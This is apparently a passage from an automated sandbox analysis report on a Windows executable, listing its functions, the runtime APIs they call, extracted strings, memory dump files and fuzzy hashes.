Instruction ID: 44e53d387a52338c5dcf49094a8edce766988aa96f31278f53c4a5b6d7d1483f
Opcode Fuzzy Hash: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
Instruction Fuzzy Hash: 13514EB6A0AB8683DF258F56E55426DB362FB68BC4B148532CB9E477A1DF3CD4518300

Function 00007FF6099C5B70 Relevance: 6.1, APIs: 4, Instructions: 127COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C5BAC
realloc.MSVCRT ref: 00007FF6099C5C30
realloc.MSVCRT ref: 00007FF6099C5C80
realloc.MSVCRT ref: 00007FF6099C5CDB

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 20953f9e9240fd2666c6fd200cec74d4ec21cc6e74914b9a1bb946a4a4a6ed08
Instruction ID: 3efcc6ab584237967a13eb7a32aa2e34c8a13616075f9145eabe3455762a61f1
Opcode Fuzzy Hash: 20953f9e9240fd2666c6fd200cec74d4ec21cc6e74914b9a1bb946a4a4a6ed08
Instruction Fuzzy Hash: F24150B2A0AB8683DF258F56E454269B362EB58BC4F548531DB9E477A2EF3CE4418300

Function 00007FF6099D2060 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00007FF6099D2086
fputc.MSVCRT ref: 00007FF6099D2150

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fputclocaleconv
String ID:
API String ID: 697933784-0
Opcode ID: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
Instruction ID: e56378403f1de6bbdd2b49190ff2962b96113c19f59f799180db997a2e48c0b3
Opcode Fuzzy Hash: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
Instruction Fuzzy Hash: 92414F62E091428AF7359F66E5C137E72A2EB14754F284235DB7E82BC3DE2CE5C28750

Function 00007FF6099CB760 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CB7AA
realloc.MSVCRT ref: 00007FF6099CB80C
memcpy.MSVCRT ref: 00007FF6099CB826
realloc.MSVCRT ref: 00007FF6099CB85E

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 0110527e016c01b0a12a7529867a8ac73845aff24685a5758aca368fee7433c9
Instruction ID: 959c180a8b047a771446287b4beda3baf697e82ae5a4064e3b338811b5e9efd3
Opcode Fuzzy Hash: 0110527e016c01b0a12a7529867a8ac73845aff24685a5758aca368fee7433c9
Instruction Fuzzy Hash: BB3146B2A05B4583EE25DF56F9942697362EB58BC4F188431DB9E57792DF3CD441C300

Function 00007FF6099CDB70 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099CDC32

Strings

enum, xrefs: 00007FF6099CDBC8
union, xrefs: 00007FF6099CDBE6
struct, xrefs: 00007FF6099CDBD7

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc
String ID: enum$struct$union
API String ID: 2803490479-1076304440
Opcode ID: 9eeface4d110fd4f93855d0c537ecc8917bf5016c94e455d4abe1fc3c89d10f7
Instruction ID: b64f727b4ce0185c5bf7ca139fd631699df401071f990a21768ac7391d82cc7c
Opcode Fuzzy Hash: 9eeface4d110fd4f93855d0c537ecc8917bf5016c94e455d4abe1fc3c89d10f7
Instruction Fuzzy Hash: 1631E272A09A4184F7048F15E89867932A6EB44B91F6D4536EE4E4B7D2DE3CE583C300

Function 00007FF6099CE5F0 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CE65A
realloc.MSVCRT ref: 00007FF6099CE6B3
memcpy.MSVCRT ref: 00007FF6099CE6CD
realloc.MSVCRT ref: 00007FF6099CE705

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 92ab20d4474b65fcd413b3cc6ffba1703cdc3f62fa15c2224de3fc87839058f1
Instruction ID: 6e950f0d2b33b6448847d4beb559f91641eb691e360b17f829edaca686a29445
Opcode Fuzzy Hash: 92ab20d4474b65fcd413b3cc6ffba1703cdc3f62fa15c2224de3fc87839058f1
Instruction Fuzzy Hash: 6C3175B6A05B4683DF29CF56F95427DA366EB58BC0F188432DB9E47796EF3CE4418200

Function 00007FF6099BFF19 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099C003A
realloc.MSVCRT ref: 00007FF6099C00E0
malloc.MSVCRT ref: 00007FF6099C00F9
memcpy.MSVCRT ref: 00007FF6099C0114

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$memcpyrealloc
String ID:
API String ID: 2642181057-0
Opcode ID: 7b5389b9c9a85f3a34e23261bf769740200db070f8f6c41ee47b25707c61576f
Instruction ID: b26615cf04f5b2f26c039804cf44535846dfd8ee248b961c46e7cb47b252dc1b
Opcode Fuzzy Hash: 7b5389b9c9a85f3a34e23261bf769740200db070f8f6c41ee47b25707c61576f
Instruction Fuzzy Hash: B931E572706B8185DE59DF21E9402A963A6FB09B94F6C4935CB9D8B397EF3CE581C300

Function 00007FF6099CC940 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CC9AA
realloc.MSVCRT ref: 00007FF6099CCA06
memcpy.MSVCRT ref: 00007FF6099CCA20
realloc.MSVCRT ref: 00007FF6099CCA58

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 92f0a808aa39fa7eb3d3e1b92975e20d59c52e8dbb1dc89ffce3e6ef201c367b
Instruction ID: 17f00d7dc5b8d00dc4dc8e6ec2bad5a7ce81950dabb09637be7c78ffdccf0ffd
Opcode Fuzzy Hash: 92f0a808aa39fa7eb3d3e1b92975e20d59c52e8dbb1dc89ffce3e6ef201c367b
Instruction Fuzzy Hash: EE3146B6A05B4683DF29CF56F9542696762EB58BC0F188832CBDE47796EF3CE4418300

Function 00007FF6099C7190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C7358
memcpy.MSVCRT ref: 00007FF6099C7374

Strings

%af, xrefs: 00007FF6099C730A

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: memcpyrealloc
String ID: %af
API String ID: 2500458235-435209106
Opcode ID: 189d169f33cf6af8ca0065567002fe4ddead3edd4c8bf95d75048c77e3cd1801
Instruction ID: 46e565b386c778221fbef5782e32f12d0d8d8cfaee992920a18f50de4cf90d5a
Opcode Fuzzy Hash: 189d169f33cf6af8ca0065567002fe4ddead3edd4c8bf95d75048c77e3cd1801
Instruction Fuzzy Hash: ED519DA2B1C6C147D73A8B34F540B9D6F62D7A2391F188225DF6903B96EE3DC6068B00

Function 00007FF6099B2410 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6099B1247), ref: 00007FF6099B2589

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF6099B270B
Unknown pseudo relocation protocol version %d., xrefs: 00007FF6099B271B

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 5b47f7b3415e9acf973e285d3e0f13b1c7560d1d6d05a1c3766290b15ed4b865
Instruction ID: 7d0ebb169b3250713ada71c5ab118ed3fd8b452be062399c052b6ed1ee7964bb
Opcode Fuzzy Hash: 5b47f7b3415e9acf973e285d3e0f13b1c7560d1d6d05a1c3766290b15ed4b865
Instruction Fuzzy Hash: 97515E32E1A546C6EB109F25EA807B83772EB14B94F684131DA2D8779ADF7CE586C700

Function 00007FF6099CBED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099CBF01
realloc.MSVCRT ref: 00007FF6099CBFEA

Strings

struct, xrefs: 00007FF6099CBED0

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: mallocrealloc
String ID: struct
API String ID: 948496778-3130185518
Opcode ID: 35616c4f7b5d9537541ddb626232e0a783046c49ffb19191163ac48addb01a71
Instruction ID: f8d08c5acb752a726ec0b5e654addd3a19050404227b73ea1b7701f5f01fd066
Opcode Fuzzy Hash: 35616c4f7b5d9537541ddb626232e0a783046c49ffb19191163ac48addb01a71
Instruction Fuzzy Hash: 9941BE72A09B9582DB25CF16E4446A83775FB58BD1F288532DF9D877A2DF38D492C300

Function 00007FF6099BEB10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099BEB49
realloc.MSVCRT ref: 00007FF6099BEBDD

Strings

ble for , xrefs: 00007FF6099BEB69

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: ble for
API String ID: 471065373-1503916205
Opcode ID: 7d0b51c97a29845c4b7d3c5cbaae78ce6d4dab227ee38db279accd03066f3836
Instruction ID: a760a0af6a9dd20f8d2542be38b32b8cb92488d4ec30a5caf23b55431241c6d9
Opcode Fuzzy Hash: 7d0b51c97a29845c4b7d3c5cbaae78ce6d4dab227ee38db279accd03066f3836
Instruction Fuzzy Hash: 2E319FB2A09B5582EE298F56E5501AC7772FB98FC0B188432CF9E47765DF3CE4918200

Function 00007FF6099BD2D9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099BD313

Strings

std, xrefs: 00007FF6099BD36F

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc
String ID: std
API String ID: 2803490479-2826573480
Opcode ID: 39a9b4e02e6c7c124a628c552a4636f6e40e277c28f87722f2353c0517b7eef5
Instruction ID: ec05d5d06841e91b72dd1fa700d52f44051a97ad1f1033ef2cb3938682a526bc
Opcode Fuzzy Hash: 39a9b4e02e6c7c124a628c552a4636f6e40e277c28f87722f2353c0517b7eef5
Instruction Fuzzy Hash: 7631B07260AB4285EA598F15E5443B937A6EB04B54F2D0136CA9C8B3D3DE3CE1818310

Function 00007FF6099CEF40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CEFAA
realloc.MSVCRT ref: 00007FF6099CF037

Strings

vector[, xrefs: 00007FF6099CEFBF

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: vector[
API String ID: 471065373-3542213508
Opcode ID: c4488cd4258865b302a78e24845e525baf049f33d3f4fcfc29418687803e7592
Instruction ID: d4375f1381874b07814e0176be7c81766b02ca38091cb4abcb7240c5de77a7f6
Opcode Fuzzy Hash: c4488cd4258865b302a78e24845e525baf049f33d3f4fcfc29418687803e7592
Instruction Fuzzy Hash: CA3161B6A09B4582DF29CF56E95416DA762FB58FC0B148832CF9E477A5DF3CD4528300

Function 00007FF6099C94E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C9520
realloc.MSVCRT ref: 00007FF6099C95B3

Strings

&, xrefs: 00007FF6099C9545

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: &
API String ID: 471065373-1010288
Opcode ID: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
Instruction ID: af62199e48b634e129f551c7fc38e680c471b1d257323857274b6c909d1e5065
Opcode Fuzzy Hash: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
Instruction Fuzzy Hash: EF3190B3A09B8586DB25CF25F4402AEB7A1F758B84F188621DB9D47795EF3CD541C300

Function 00007FF6099B4A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6099B4A8C
fflush.MSVCRT ref: 00007FF6099B4B5C

Strings

libunwind: pc not in table, pc=0x%llX, xrefs: 00007FF6099B4B40

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: EntryFunctionLookupfflush
String ID: libunwind: pc not in table, pc=0x%llX
API String ID: 1930725923-1970586329
Opcode ID: 3d495f0f2960550110fa8eb07f73b5c1ec580fd706c87246941946c30414a956
Instruction ID: 17059f845f69c72404c3e5a9f0f07a5bd5ac210e32c29261227c56592e304c7f
Opcode Fuzzy Hash: 3d495f0f2960550110fa8eb07f73b5c1ec580fd706c87246941946c30414a956
Instruction Fuzzy Hash: 3A317E62905B9181E7158F34E5913AC73B2EF89B88F288339CA8D56796EF3C9891D340

Function 00007FF6099CAF70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CAFA8

Strings

operator, xrefs: 00007FF6099CAFB9
r"" , xrefs: 00007FF6099CAFC7

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: operator$r""
API String ID: 471065373-3690342460
Opcode ID: e1620a572d8d04512c69ef91134d241d4fe72b19f885483c170cd34e2c6e07b0
Instruction ID: 376dee7bb0a56e473e8a3c0fccdd2ee8be41e78983f6b4757ca8d55c03b07bfa
Opcode Fuzzy Hash: e1620a572d8d04512c69ef91134d241d4fe72b19f885483c170cd34e2c6e07b0
Instruction Fuzzy Hash: 5A1190F2A0AB9582DA199F46EA50068B762EB98FD0B148832CF4D47795DF38D5E28300

Function 00007FF6099D3A80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

_time64.MSVCRT ref: 00007FF6099D3AA7

Strings

%s , xrefs: 00007FF6099D3AE1
[%Y-%m-%d %H:%M:%S], xrefs: 00007FF6099D3AC5

Memory Dump Source

